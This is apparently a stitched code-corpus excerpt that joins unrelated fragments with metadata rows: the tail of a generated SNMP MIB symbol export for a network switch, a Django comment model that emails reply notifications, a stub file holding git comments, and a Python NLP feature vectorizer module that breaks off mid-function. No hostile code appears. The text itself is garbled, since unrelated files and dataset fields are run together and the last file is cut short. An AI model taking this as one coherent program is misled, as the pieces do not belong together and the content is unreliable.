swL2IGMPMulticastVlanGroupRangeName=swL2IGMPMulticastVlanGroupRangeName, swL2IpLimitedMulticastRangeName=swL2IpLimitedMulticastRangeName, swL2IpLimitedMulticastDelState=swL2IpLimitedMulticastDelState, swL2DevCtrlIGMPSnoopingMcstRTOnly=swL2DevCtrlIGMPSnoopingMcstRTOnly, swL2MirrorGroupID=swL2MirrorGroupID, swL2PortInfoType=swL2PortInfoType, swCpuRxRateControlTable=swCpuRxRateControlTable, swDevInfoTotalNumOfPort=swDevInfoTotalNumOfPort, swL2DhcpLocalRelayVLANID=swL2DhcpLocalRelayVLANID, swL2IGMPLastMemberQueryInterval=swL2IGMPLastMemberQueryInterval, swL2TrunkAlgorithm=swL2TrunkAlgorithm, swL2IGMPInfoTable=swL2IGMPInfoTable, swL2LimitedMulticastAddressPort=swL2LimitedMulticastAddressPort, swL2IGMPCtrlState=swL2IGMPCtrlState, swL2PortSecurityMode=swL2PortSecurityMode, swL2IGMPMulticastVlanGroupTail=swL2IGMPMulticastVlanGroupTail, swL2dot1vProtocolGroupEntry=swL2dot1vProtocolGroupEntry, swL2QOS8021pDefaultPriorityEntry=swL2QOS8021pDefaultPriorityEntry, swL2PortDropCounterEntry=swL2PortDropCounterEntry, swL2IGMPForwardingGroupAddr=swL2IGMPForwardingGroupAddr, swL2QOSSchedulingMechanism=swL2QOSSchedulingMechanism, swL2PortAutoNegInfoCapAdvertisedBits=swL2PortAutoNegInfoCapAdvertisedBits, swL2IGMPMulticastVlanUntagSourcePort=swL2IGMPMulticastVlanUntagSourcePort, swL2DevCtrlWebState=swL2DevCtrlWebState, swL2VlanLoopRestart=swL2VlanLoopRestart, swL2VlanName=swL2VlanName, MacAddress=MacAddress, swDevModuleInfoModuleID=swDevModuleInfoModuleID, swL2QOS8021pRadiusPriority=swL2QOS8021pRadiusPriority, swL2PortSecurityControlEntry=swL2PortSecurityControlEntry, swL2PortCtrlLockState=swL2PortCtrlLockState, swL2PortCtrlAutoNegCapAdvertisedBits=swL2PortCtrlAutoNegCapAdvertisedBits, swCosBandwidthClassID=swCosBandwidthClassID, swL2IGMPMulticastVlanReplaceSourceIP=swL2IGMPMulticastVlanReplaceSourceIP, swL2PortAutoNegInfoEntry=swL2PortAutoNegInfoEntry, swL2PortCtrlUnitIndex=swL2PortCtrlUnitIndex, swDevInfoNumOfPortInUse=swDevInfoNumOfPortInUse, swL2MulticastRangeTail=swL2MulticastRangeTail, swL2IGMPCurrentState=swL2IGMPCurrentState, swL2TrunkMgmt=swL2TrunkMgmt, swL2LoopDetectPortLoopVLAN=swL2LoopDetectPortLoopVLAN, swL2IGMPMulticastVlanRowStatus=swL2IGMPMulticastVlanRowStatus, swL2PortACLDrops=swL2PortACLDrops, swL2IGMPMulticastVlanGroupVid=swL2IGMPMulticastVlanGroupVid, swL2IGMPInfoQueryCount=swL2IGMPInfoQueryCount, swL2TrunkMasterPort=swL2TrunkMasterPort, swL2IGMPMulticastVlanGroupHead=swL2IGMPMulticastVlanGroupHead, swL2QOSSchedulingClassID=swL2QOSSchedulingClassID, swL2MirrorGroupEntry=swL2MirrorGroupEntry, swL2IGMPMaxIpGroupNumPerVlan=swL2IGMPMaxIpGroupNumPerVlan, swL2MgmtMIBTraps=swL2MgmtMIBTraps, swL2DevCtrlVlanIdOfFDBTbl=swL2DevCtrlVlanIdOfFDBTbl, swL2MirrorGroupPortSourceIngress=swL2MirrorGroupPortSourceIngress, swL2DhcpLocalRelayVLANEntry=swL2DhcpLocalRelayVLANEntry, swL2TrunkMaxSupportedEntries=swL2TrunkMaxSupportedEntries, swL2TrunkVLANTable=swL2TrunkVLANTable, swL2DevCtrlCleanAllStatisticCounter=swL2DevCtrlCleanAllStatisticCounter, swL2IGMPMulticastVlanRangeName=swL2IGMPMulticastVlanRangeName, swL2MgmtMIB=swL2MgmtMIB, swL2MulticastRangeState=swL2MulticastRangeState, swL2VlanTable=swL2VlanTable, swL2QOSBandwidthRadiusTxRate=swL2QOSBandwidthRadiusTxRate, swL2DevAlarmTopologyChange=swL2DevAlarmTopologyChange, swL2MultiFilterTable=swL2MultiFilterTable, swL2TrunkVLANState=swL2TrunkVLANState, swL2IGMPMulticastVlanState=swL2IGMPMulticastVlanState, swL2QOS8021pDefaultPriorityIndex=swL2QOS8021pDefaultPriorityIndex, swL2PortCtrlFlowCtrlState=swL2PortCtrlFlowCtrlState, swL2IGMPForwardingEntry=swL2IGMPForwardingEntry, swL2LoopDetectAdminState=swL2LoopDetectAdminState, swL2QOSSchedulingEntry=swL2QOSSchedulingEntry, swDevInfoFirmwareVersion=swDevInfoFirmwareVersion, swL2IGMPInfoTxQueryCount=swL2IGMPInfoTxQueryCount, swL2QOSBandwidthControlTable=swL2QOSBandwidthControlTable, swL2PortInfoUnitID=swL2PortInfoUnitID, swL2dot1vProtocolMgmt=swL2dot1vProtocolMgmt, swL2IGMPSnoopingStaticGroupRowStatus=swL2IGMPSnoopingStaticGroupRowStatus, swL2IpLimitedMulticastMgmt=swL2IpLimitedMulticastMgmt, swL2QOSBandwidthTxRate=swL2QOSBandwidthTxRate, swL2DevCtrlVLANTrunkState=swL2DevCtrlVLANTrunkState, swL2PortInfoNwayStatus=swL2PortInfoNwayStatus, swL2PortSecurityDelActivity=swL2PortSecurityDelActivity, swL2PortLoopOccurred=swL2PortLoopOccurred, swL2NotifyPrefix=swL2NotifyPrefix, swL2IpLimitedMulticastRangeNameState=swL2IpLimitedMulticastRangeNameState, swL2TrunkIndex=swL2TrunkIndex, swL2PortInfoMediumType=swL2PortInfoMediumType, swL2QOS8021pUserPriorityClass=swL2QOS8021pUserPriorityClass, swL2MulticastRangeMgmt=swL2MulticastRangeMgmt, swIGMPSnoopingGroupGroupAddr=swIGMPSnoopingGroupGroupAddr, swL2DhcpLocalRelayMgmt=swL2DhcpLocalRelayMgmt, swDevInfoBootPromVersion=swDevInfoBootPromVersion, swL2QOSSchedulingMechanismCtrl=swL2QOSSchedulingMechanismCtrl, swL2DevCtrlClipagingState=swL2DevCtrlClipagingState, swL2IGMPMulticastVlanTagMemberPort=swL2IGMPMulticastVlanTagMemberPort, swL2IGMPMulticastVlanTable=swL2IGMPMulticastVlanTable, swL2TrunkLACPPortTable=swL2TrunkLACPPortTable, swL2IpLimitedMulticastState=swL2IpLimitedMulticastState, swL2IGMPRouterDynamicPortList=swL2IGMPRouterDynamicPortList, swL2PortSecurityDelPort=swL2PortSecurityDelPort, swIGMPSnoopingGroupExcludePortMap=swIGMPSnoopingGroupExcludePortMap, swL2IGMPCtrlVid=swL2IGMPCtrlVid, swL2DevAlarmNewRoot=swL2DevAlarmNewRoot, swL2macNotifyInfo=swL2macNotifyInfo, swL2PortInfoEntry=swL2PortInfoEntry, swL2PortAutoNegInfoCapabilityBits=swL2PortAutoNegInfoCapabilityBits, swL2IGMPForwardingTable=swL2IGMPForwardingTable, swL2dot1vProtocolGroupRowStatus=swL2dot1vProtocolGroupRowStatus, swCosBandwidthControlTable=swCosBandwidthControlTable, swDevModuleInfoUnitID=swDevModuleInfoUnitID, swL2LimitedMulticastAddressRangeName=swL2LimitedMulticastAddressRangeName, swL2IGMPForwardingSrcIp=swL2IGMPForwardingSrcIp, swL2MulticastRangeName=swL2MulticastRangeName, swL2PortSecurityMgmt=swL2PortSecurityMgmt, swL2DevCtrlTelnetState=swL2DevCtrlTelnetState, swL2VlanType=swL2VlanType, swL2dot1vProtocolPortGroupVid=swL2dot1vProtocolPortGroupVid, swL2PortInfoPortIndex=swL2PortInfoPortIndex, swL2TrunkType=swL2TrunkType, swL2IGMPRouterForbiddenPortList=swL2IGMPRouterForbiddenPortList, swL2DevInfo=swL2DevInfo, swL2VlanEntry=swL2VlanEntry, swL2PortCtrlAdminState=swL2PortCtrlAdminState, swL2MultiFilterMode=swL2MultiFilterMode, swL2IGMPReportSuppression=swL2IGMPReportSuppression, PYSNMP_MODULE_ID=swL2MgmtMIB, swL2dot1vProtocolPortTable=swL2dot1vProtocolPortTable, swL2PortSecurityPortIndex=swL2PortSecurityPortIndex, swL2LoopDetectCtrl=swL2LoopDetectCtrl, swL2MirrorGroupPortSourceEngress=swL2MirrorGroupPortSourceEngress, swL2IpLimitedMulticastPortIndex=swL2IpLimitedMulticastPortIndex, swL2DevCtrlIpAutoconfig=swL2DevCtrlIpAutoconfig, swL2DhcpLocalRelayVLANTable=swL2DhcpLocalRelayVLANTable, swL2dot1vProtocolPortEntry=swL2dot1vProtocolPortEntry, swIGMPSnoopingGroupEntry=swIGMPSnoopingGroupEntry, swL2IGMPSnoopingStaticGroupTable=swL2IGMPSnoopingStaticGroupTable, swL2PortCtrlMediumType=swL2PortCtrlMediumType, swL2LoopDetectPortIndex=swL2LoopDetectPortIndex, swL2IGMPVid=swL2IGMPVid, swL2IGMPRouterPortsVid=swL2IGMPRouterPortsVid, swL2PortVLANIngressDrops=swL2PortVLANIngressDrops, swL2IGMPIpGroupReportCount=swL2IGMPIpGroupReportCount, swL2PortAutoNegInfoPortIndex=swL2PortAutoNegInfoPortIndex, swL2MACNotifyInterval=swL2MACNotifyInterval, swL2MirrorLogicTargetPort=swL2MirrorLogicTargetPort, swL2PortAutoNegInfoAdminStatus=swL2PortAutoNegInfoAdminStatus, swL2DevCtrlWeb=swL2DevCtrlWeb, swL2PortMgmt=swL2PortMgmt, swL2dot1vProtocolPort=swL2dot1vProtocolPort, swCpuRxRateControlEntry=swCpuRxRateControlEntry, VlanId=VlanId, swL2TrunkMember=swL2TrunkMember, swL2LoopDetectPortEntry=swL2LoopDetectPortEntry, swL2IGMPSnoopingStaticGroupEntry=swL2IGMPSnoopingStaticGroupEntry, swL2VlanStaticPorts=swL2VlanStaticPorts, swL2PortSecurityDelMacAddress=swL2PortSecurityDelMacAddress, swL2IGMPMulticastVlanMemberPort=swL2IGMPMulticastVlanMemberPort, swL2LoopDetectRecoverTime=swL2LoopDetectRecoverTime, swL2PortDropCounterTable=swL2PortDropCounterTable, swL2QOSBandwidthPortIndex=swL2QOSBandwidthPortIndex, swL2VlanCurrentTaggedPorts=swL2VlanCurrentTaggedPorts, swL2MulticastRangeEntry=swL2MulticastRangeEntry, swL2VlanMgmt=swL2VlanMgmt, swDevInfoFrontPanelLedStatus=swDevInfoFrontPanelLedStatus, swL2TrafficSegMgmt=swL2TrafficSegMgmt, swDevModuleInfoReversion=swDevModuleInfoReversion, swL2DevCtrlRmonState=swL2DevCtrlRmonState, swL2QOS8021pUserPriorityIndex=swL2QOS8021pUserPriorityIndex, swL2IGMPCtrlTable=swL2IGMPCtrlTable, swL2QOSSchedulingMaxPkts=swL2QOSSchedulingMaxPkts, swDevModuleInfoDescription=swDevModuleInfoDescription, swL2IGMPForwardingPortMember=swL2IGMPForwardingPortMember, swL2QOSMgmt=swL2QOSMgmt, swL2IGMPGroupIpAddr=swL2IGMPGroupIpAddr, swCosBandwidthControlEntry=swCosBandwidthControlEntry, swL2DhcpLocalRelayState=swL2DhcpLocalRelayState, swIGMPSnoopingGroupIncludePortMap=swIGMPSnoopingGroupIncludePortMap, swL2IGMPMulticastVlanEntry=swL2IGMPMulticastVlanEntry, swL2TrunkLACPPortState=swL2TrunkLACPPortState, swL2LoopDetectMgmt=swL2LoopDetectMgmt, IANAifMauAutoNegCapBits=IANAifMauAutoNegCapBits, swL2LoopDetectPortState=swL2LoopDetectPortState, swL2TrafficSegTable=swL2TrafficSegTable, swL2PortSecurityAdmState=swL2PortSecurityAdmState, swL2QOSHolPreventionCtrl=swL2QOSHolPreventionCtrl, swL2DevMgmt=swL2DevMgmt, swL2dot1vProtocolPortGroupId=swL2dot1vProtocolPortGroupId, swL2DevCtrlManagementVlanId=swL2DevCtrlManagementVlanId, swL2LoopDetectPortLoopStatus=swL2LoopDetectPortLoopStatus, swL2PortSecurityDelVlanName=swL2PortSecurityDelVlanName, swL2DevCtrlStpState=swL2DevCtrlStpState, swL2IGMPMaxResponseTime=swL2IGMPMaxResponseTime, swL2macNotification=swL2macNotification, swL2TrafficSegEntry=swL2TrafficSegEntry, swL2PortCtrlAutoNegRestart=swL2PortCtrlAutoNegRestart, swL2IGMPMulticastVlanid=swL2IGMPMulticastVlanid, swL2IGMPQueryInfoTable=swL2IGMPQueryInfoTable, swL2MirrorPortSourceEgress=swL2MirrorPortSourceEgress, swL2MultiFilterVid=swL2MultiFilterVid, swL2QOSBandwidthRxRate=swL2QOSBandwidthRxRate, swL2dot1vProtocolGroupTable=swL2dot1vProtocolGroupTable, swL2PortDropCounterPortIndex=swL2PortDropCounterPortIndex, swIGMPSnoopingGroupTable=swIGMPSnoopingGroupTable, swL2MirrorGroupLogicTargetPort=swL2MirrorGroupLogicTargetPort, PortList=PortList, swL2VlanAdvertisementState=swL2VlanAdvertisementState, swL2dot1vProtocolGroupId=swL2dot1vProtocolGroupId, swL2VlanLoopOccurred=swL2VlanLoopOccurred, swL2IGMPMulticastVlanReplacePriority=swL2IGMPMulticastVlanReplacePriority, swL2TrunkCtrlTable=swL2TrunkCtrlTable, swL2PortSecurityMaxLernAddr=swL2PortSecurityMaxLernAddr, swL2DevAlarmLinkChange=swL2DevAlarmLinkChange, swL2IGMPLeaveTimer=swL2IGMPLeaveTimer, swL2PortAutoNegInfoCapReceivedBits=swL2PortAutoNegInfoCapReceivedBits, swL2VlanStaticTaggedPorts=swL2VlanStaticTaggedPorts, swL2MirrorPortSourceIngress=swL2MirrorPortSourceIngress, swDevModuleInfoTable=swDevModuleInfoTable)
mibBuilder.exportSymbols("DGS3612-L2MGMT-MIB", swL2IpLimitedMulticastHead=swL2IpLimitedMulticastHead, swL2TrunkState=swL2TrunkState, swL2TrunkLACPPortEntry=swL2TrunkLACPPortEntry, swL2IGMPRouterStaticPortList=swL2IGMPRouterStaticPortList, swL2MACNotifyState=swL2MACNotifyState, swL2TrunkFloodingPort=swL2TrunkFloodingPort, swL2DhcpLocalRelayVLANState=swL2DhcpLocalRelayVLANState, swCosBandwidthMaxRate=swCosBandwidthMaxRate, swL2DevCtrl=swL2DevCtrl, swL2PortCtrlTable=swL2PortCtrlTable, swL2IGMPSnoopingStaticGroupIPaddress=swL2IGMPSnoopingStaticGroupIPaddress, swL2MulticastRangeTable=swL2MulticastRangeTable, swL2IGMPMulticastVlanRemapPriority=swL2IGMPMulticastVlanRemapPriority, swL2LoopDetectMode=swL2LoopDetectMode, swCpuRxClassID=swCpuRxClassID, swL2TrunkActivePorts=swL2TrunkActivePorts, swl2NotificationBidings=swl2NotificationBidings, swCosBandwidthMinRate=swCosBandwidthMinRate, swL2QOS8021pUserPriorityTable=swL2QOS8021pUserPriorityTable, swL2TrunkCtrlEntry=swL2TrunkCtrlEntry, swL2LoopDetectPortMgmt=swL2LoopDetectPortMgmt, swL2PortInfoErrDisReason=swL2PortInfoErrDisReason, swL2VlanMemberPorts=swL2VlanMemberPorts, swL2LimitedMulticastAddressEntry=swL2LimitedMulticastAddressEntry, swL2PortMulticastDrops=swL2PortMulticastDrops, swDevModuleInfoSerial=swDevModuleInfoSerial, swL2VlanCurrentUntaggedPorts=swL2VlanCurrentUntaggedPorts, swL2QOSBandwidthControlEntry=swL2QOSBandwidthControlEntry, swL2IGMPQueryInfoEntry=swL2IGMPQueryInfoEntry, swL2VlanLoopDetectVID=swL2VlanLoopDetectVID, swDevModuleInfoEntry=swDevModuleInfoEntry, swL2PortCtrlPortIndex=swL2PortCtrlPortIndex, swL2PortSecurityControlTable=swL2PortSecurityControlTable, swL2TrunkVLANEntry=swL2TrunkVLANEntry, swL2MirrorGroupRowStatus=swL2MirrorGroupRowStatus, swL2IGMPInfoEntry=swL2IGMPInfoEntry, swL2PortSecurityDelCtrl=swL2PortSecurityDelCtrl, swL2PortInfoLinkStatus=swL2PortInfoLinkStatus, swL2IGMPQueryInterval=swL2IGMPQueryInterval, swL2IGMPMulticastVlanGroupEntry=swL2IGMPMulticastVlanGroupEntry, swL2TrafficSegForwardPorts=swL2TrafficSegForwardPorts, swCosBandwidthPort=swCosBandwidthPort, swL2LimitedMulticastAddressHead=swL2LimitedMulticastAddressHead, swCpuRxRateControlStatus=swCpuRxRateControlStatus, swL2IGMPSnoopingStaticGroupVID=swL2IGMPSnoopingStaticGroupVID, swL2MirrorGroupState=swL2MirrorGroupState, swL2PortCtrlJumboFrame=swL2PortCtrlJumboFrame, swL2QOS8021pDefaultPriority=swL2QOS8021pDefaultPriority, swL2VlanStaticUntaggedPorts=swL2VlanStaticUntaggedPorts, swL2Notify=swL2Notify, swL2IGMPQueryState=swL2IGMPQueryState, swL2IGMPMulticastVlanName=swL2IGMPMulticastVlanName, swL2IGMPInfoVid=swL2IGMPInfoVid, swL2MirrorMgmt=swL2MirrorMgmt, swL2DevCtrlIGMPSnooping=swL2DevCtrlIGMPSnooping, swL2IGMPMulticastVlanRangeState=swL2IGMPMulticastVlanRangeState, swL2TrafficSegPort=swL2TrafficSegPort, swL2IpLimitedMulticastEntry=swL2IpLimitedMulticastEntry, swL2VlanForbiddenPorts=swL2VlanForbiddenPorts, swL2MirrorPortState=swL2MirrorPortState, swL2dot1vProtocolTemplateFrameType=swL2dot1vProtocolTemplateFrameType, swL2IGMPRouterPortsTable=swL2IGMPRouterPortsTable, swL2QOSSchedulingPort=swL2QOSSchedulingPort, swL2PortCtrlEntry=swL2PortCtrlEntry, swL2IpLimitedMulticastAccess=swL2IpLimitedMulticastAccess, swL2QOSSchedulingMechanismEffec=swL2QOSSchedulingMechanismEffec, swL2MultiFilterEntry=swL2MultiFilterEntry, swL2IGMPQueryVersion=swL2IGMPQueryVersion, swL2DevCtrlLedPOEState=swL2DevCtrlLedPOEState, swL2LoopDetectTrapMode=swL2LoopDetectTrapMode, swL2IpLimitedMulticastTable=swL2IpLimitedMulticastTable, swL2IpLimitedMulticastTail=swL2IpLimitedMulticastTail, swL2LoopDetectPortTable=swL2LoopDetectPortTable, swL2LimitedMulticastAddressTable=swL2LimitedMulticastAddressTable, swL2LoopDetectInterval=swL2LoopDetectInterval, swL2MACNotifyHistorySize=swL2MACNotifyHistorySize, swL2PortInfoTable=swL2PortInfoTable, swL2LimitedMulticastAddressTail=swL2LimitedMulticastAddressTail, swL2dot1vProtocolPortRowStatus=swL2dot1vProtocolPortRowStatus, swL2IGMPMgmt=swL2IGMPMgmt, swL2MirrorGroupTable=swL2MirrorGroupTable, swL2TrunkLACPPortIndex=swL2TrunkLACPPortIndex, swL2IGMPRobustness=swL2IGMPRobustness, swL2DevCtrlLLDPState=swL2DevCtrlLLDPState, swL2dot1vProtocolTemplateProtocolValue=swL2dot1vProtocolTemplateProtocolValue)
| 155.740704
| 12,771
| 0.791781
|
794da030b15f83eb42186125c67ec69c33836833
| 2,283
|
py
|
Python
|
comment/models.py
|
knightwk/mysite
|
9935b05e97fd5fb0cd57a0e97b8241ee4a8a67a5
|
[
"Apache-2.0"
] | null | null | null |
comment/models.py
|
knightwk/mysite
|
9935b05e97fd5fb0cd57a0e97b8241ee4a8a67a5
|
[
"Apache-2.0"
] | 14
|
2020-06-05T07:13:18.000Z
|
2022-03-11T23:45:57.000Z
|
comment/models.py
|
knightwk/mysite
|
9935b05e97fd5fb0cd57a0e97b8241ee4a8a67a5
|
[
"Apache-2.0"
] | null | null | null |
import threading
from django.db import models
from django.core.mail import send_mail
from django.conf import settings
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from django.template.loader import render_to_string
class SendMail(threading.Thread):
def __init__(self, subject, text, email, fail_silently=False):
self.subject = subject
self.text = text
self.email = email
self.fail_sliently = fail_silently
threading.Thread.__init__(self)
def run(self):
send_mail(self.subject,
'',
settings.EMAIL_HOST_USER,
[self.email],
fail_silently=self.fail_sliently,
html_message = self.text
)
# Create your models here.
class Comment(models.Model):
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
text = models.TextField()
comment_time = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(User, related_name="comments", on_delete=models.CASCADE)
root = models.ForeignKey('self', related_name='root_comment', null=True, on_delete=models.CASCADE)
parent = models.ForeignKey('self', related_name='parent_comment', null=True, on_delete=models.CASCADE)
reply_to = models.ForeignKey(User, related_name="replies", null=True, on_delete=models.CASCADE)
def send_mail(self):
if self.parent is None:
# 评论我的博客
subject = '有人评论你的博客'
email = self.content_object.get_email()
else:
# 回复评论
subject = '有人回复你的评论'
email = self.reply_to.email
if email != '':
context = {}
context['comment_text'] = self.text
context['url'] = self.content_object.get_url()
text = render_to_string('comment/send_mail.html', context)
send_mail = SendMail(subject, text, email)
send_mail.start()
def __str__(self):
return self.text
class Meta:
ordering = ['comment_time']
| 36.238095
| 106
| 0.657906
|
794da17447a529745c118efb54689f6efa1e34b8
| 51
|
py
|
Python
|
Python/PythonTest.py
|
SPPhotonic/JetsonTX1
|
d0cea6bb34fd8a02e337611c18eebaeb43bbf1e2
|
[
"MIT"
] | null | null | null |
Python/PythonTest.py
|
SPPhotonic/JetsonTX1
|
d0cea6bb34fd8a02e337611c18eebaeb43bbf1e2
|
[
"MIT"
] | null | null | null |
Python/PythonTest.py
|
SPPhotonic/JetsonTX1
|
d0cea6bb34fd8a02e337611c18eebaeb43bbf1e2
|
[
"MIT"
] | null | null | null |
#git init
#git add .
#git commit -m "First commit"
| 12.75
| 29
| 0.666667
|
794da1760b20173f8dc62e0f247a592910815c74
| 26,194
|
py
|
Python
|
src/python/zensols/deepnlp/vectorize/vectorizers.py
|
plandes/deepnlp
|
49820084ccf797d59535d5920559ab768bf2ec73
|
[
"MIT"
] | 7
|
2020-05-11T07:13:56.000Z
|
2021-09-27T13:03:46.000Z
|
src/python/zensols/deepnlp/vectorize/vectorizers.py
|
plandes/deepnlp
|
49820084ccf797d59535d5920559ab768bf2ec73
|
[
"MIT"
] | null | null | null |
src/python/zensols/deepnlp/vectorize/vectorizers.py
|
plandes/deepnlp
|
49820084ccf797d59535d5920559ab768bf2ec73
|
[
"MIT"
] | 1
|
2022-02-12T00:22:26.000Z
|
2022-02-12T00:22:26.000Z
|
"""Generate and vectorize language features.
"""
__author__ = 'Paul Landes'
from typing import List, Tuple, Set, Union, Dict
from dataclasses import dataclass, field
import logging
import sys
from functools import reduce
import torch
from torch import Tensor
from zensols.deeplearn.vectorize import (
VectorizerError,
FeatureContext,
TensorFeatureContext,
SparseTensorFeatureContext,
MultiFeatureContext,
OneHotEncodedEncodableFeatureVectorizer,
)
from zensols.nlp import (
FeatureToken, FeatureSentence, FeatureDocument, TokensContainer,
)
from . import (
SpacyFeatureVectorizer, FeatureDocumentVectorizer,
TextFeatureType, MultiDocumentVectorizer,
)
logger = logging.getLogger(__name__)
@dataclass
class EnumContainerFeatureVectorizer(FeatureDocumentVectorizer):
"""Encode tokens found in the container by aggregating the SpaCy vectorizers
output. The result is a concatenated binary representation of all
configured token level features for each token. This adds only token
vectorizer features generated by the spaCy vectorizers (subclasses of
:class:`.SpacyFeatureVectorizer`), and not the features themselves (such as
``is_stop`` etc).
All spaCy features are encoded given by
:obj:`~.FeatureDocumentVectorizerManager.spacy_vectorizers`.
However, only those given in :obj:`decoded_feature_ids` are produced in the
output tensor after decoding.
The motivation for encoding all, but decoding a subset of features is for
feature selection during training. This is because encoding the features
(in a sparse matrix) takes comparatively less time and space over having to
re-encode all batches.
Rows are tokens, columns intervals are features. The encoded matrix is
sparse, and decoded as a dense matrix.
:shape: (|sentences|, |token length|, |decoded features|)
:see: :class:`.SpacyFeatureVectorizer`
"""
ATTR_EXP_META = ('decoded_feature_ids',)
DESCRIPTION = 'spacy feature vectorizer'
FEATURE_TYPE = TextFeatureType.TOKEN
decoded_feature_ids: Set[str] = field(default=None)
"""The spaCy generated features used during *only* decoding (see class docs).
Examples include ``norm``, ``ent``, ``dep``, ``tag``. When set to
``None``, use all those given in the
:obj:`~.FeatureDocumentVectorizerManager.spacy_vectorizers`.
"""
def _get_shape_with_feature_ids(self, feature_ids: Set[str]):
"""Compute the shape based on what spacy feature ids are given.
:param feature_ids: the spacy feature ids used to filter the result
"""
flen = 0
for fvec in self.manager.spacy_vectorizers.values():
if feature_ids is None or fvec.feature_id in feature_ids:
flen += fvec.shape[1]
return None, self.token_length, flen
def _get_shape_decode(self) -> Tuple[int, int]:
"""Return the shape needed for the tensor when encoding."""
return self._get_shape_with_feature_ids(None)
def _get_shape_for_document(self, doc: FeatureDocument):
"""Return the shape of the vectorized output for the given document."""
return (len(doc.sents),
self.manager.get_token_length(doc),
self._get_shape_decode()[-1])
def _get_shape(self) -> Tuple[int, int]:
"""Compute the shape based on what spacy feature ids are given."""
return self._get_shape_with_feature_ids(self.decoded_feature_ids)
def _populate_feature_vectors(self, sent: FeatureSentence, six: int,
fvec: SpacyFeatureVectorizer, arr: Tensor,
col_start: int, col_end: int):
"""Populate ``arr`` with every feature available from the vectorizer set
defined in the manager. This fills in the corresponding vectors from
the spacy vectorizer ``fvec`` across all tokens for a column range.
"""
attr_name = fvec.feature_id
col_end = col_start + fvec.shape[1]
toks = sent.tokens[:arr.shape[1]]
for tix, tok in enumerate(toks):
val = getattr(tok, attr_name)
vec = fvec.from_spacy(val)
if vec is not None:
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'adding vec {fvec} for {tok}: {vec.shape}')
arr[six, tix, col_start:col_end] = vec
def _encode(self, doc: FeatureDocument) -> FeatureContext:
"""Encode tokens found in the container by aggregating the SpaCy vectorizers
output.
"""
arr = self.torch_config.zeros(self._get_shape_for_document(doc))
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'type array shape: {arr.shape}')
sent: FeatureSentence
for six, sent in enumerate(doc.sents):
col_start = 0
for fvec in self.manager.spacy_vectorizers.values():
col_end = col_start + fvec.shape[1]
self._populate_feature_vectors(
sent, six, fvec, arr, col_start, col_end)
col_start = col_end
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoded array shape: {arr.shape}')
return SparseTensorFeatureContext.instance(
self.feature_id, arr, self.torch_config)
def _slice_by_attributes(self, arr: Tensor) -> Tensor:
"""Create a new tensor from column based slices of the encoded tensor for each
specified feature id given in :obj:`decoded_feature_ids`.
"""
keeps = set(self.decoded_feature_ids)
col_start = 0
tensors = []
for fvec in self.manager.spacy_vectorizers.values():
col_end = col_start + fvec.shape[1]
fid = fvec.feature_id
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'type={fid}, to keep={keeps}')
if fid in keeps:
tensors.append(arr[:, :, col_start:col_end])
keeps.remove(fid)
col_start = col_end
if len(keeps) > 0:
raise VectorizerError(f'Unknown feature type IDs: {keeps}')
sarr = torch.cat(tensors, dim=2)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'slice dim: {sarr.shape}')
return sarr
def to_symbols(self, tensor: Tensor) -> List[List[Dict[str, float]]]:
"""Reverse map the tensor to spaCy features.
:return: a list of sentences, each with a list of tokens, each having a
map of name/count pairs
"""
sents = []
for six in range(tensor.size(0)):
toks = []
sents.append(toks)
for tix in range(tensor.size(1)):
col_start = 0
by_fid = {}
toks.append(by_fid)
for fvec in self.manager.spacy_vectorizers.values():
col_end = col_start + fvec.shape[1]
fid = fvec.feature_id
vec = tensor[six, tix, col_start:col_end]
cnts = dict(filter(lambda x: x[1] > 0,
zip(fvec.as_list, vec.tolist())))
by_fid[fid] = cnts
col_start = col_end
return sents
def _decode(self, context: FeatureContext) -> Tensor:
arr = super()._decode(context)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'decoded features: {self.decoded_feature_ids}, ' +
f'shape: {arr.shape}')
self._assert_decoded_doc_dim(arr, 3)
if self.decoded_feature_ids is not None:
arr = self._slice_by_attributes(arr)
return arr
@dataclass
class CountEnumContainerFeatureVectorizer(FeatureDocumentVectorizer):
"""Vectorize the counts of parsed spaCy features. This generates the count of
tokens as a S X M * N tensor where S is the number of sentences, M is the
number of token feature ids and N is the number of columns of the output of
the :class:`.SpacyFeatureVectorizer` vectorizer. Each column position's
count represents the number of counts for that spacy symol for that index
position in the output of :class:`.SpacyFeatureVectorizer`.
This class uses the same efficiency in decoding features given in
:class:`.EnumContainerFeatureVectorizer`.
:shape: (|sentences|, |decoded features|)
"""
ATTR_EXP_META = ('decoded_feature_ids',)
DESCRIPTION = 'token level feature counts'
FEATURE_TYPE = TextFeatureType.DOCUMENT
decoded_feature_ids: Set[str] = field(default=None)
def _get_shape(self) -> Tuple[int, int]:
"""Compute the shape based on what spacy feature ids are given.
"""
feature_ids = self.decoded_feature_ids
flen = 0
for fvec in self.manager.spacy_vectorizers.values():
if feature_ids is None or fvec.feature_id in feature_ids:
flen += fvec.shape[1]
return -1, flen
def get_feature_counts(self, sent: FeatureSentence,
fvec: SpacyFeatureVectorizer) -> Tensor:
"""Return the count of all tokens as a S X N tensor where S is the number of
sentences, N is the columns of the ``fvec`` vectorizer. Each column
position's count represents the number of counts for that spacy symol
for that index position in the ``fvec``.
"""
fid = fvec.feature_id
fcounts = self.torch_config.zeros(fvec.shape[1])
for tok in sent.tokens:
val = getattr(tok, fid)
fnid = fvec.id_from_spacy(val, -1)
if fnid > -1:
fcounts[fnid] += 1
return fcounts
def _encode(self, doc: FeatureDocument) -> FeatureContext:
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoding doc: {doc}')
sent_arrs = []
for sent in doc.sents:
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoding sentence: {sent}')
tok_arrs = []
for fvec in self.manager.spacy_vectorizers.values():
cnts: Tensor = self.get_feature_counts(sent, fvec)
if logger.isEnabledFor(logging.DEBUG):
logger.debug(f'encoding with {fvec}')
tok_arrs.append(cnts)
sent_arrs.append(torch.cat(tok_arrs))
arr = torch.stack(sent_arrs)
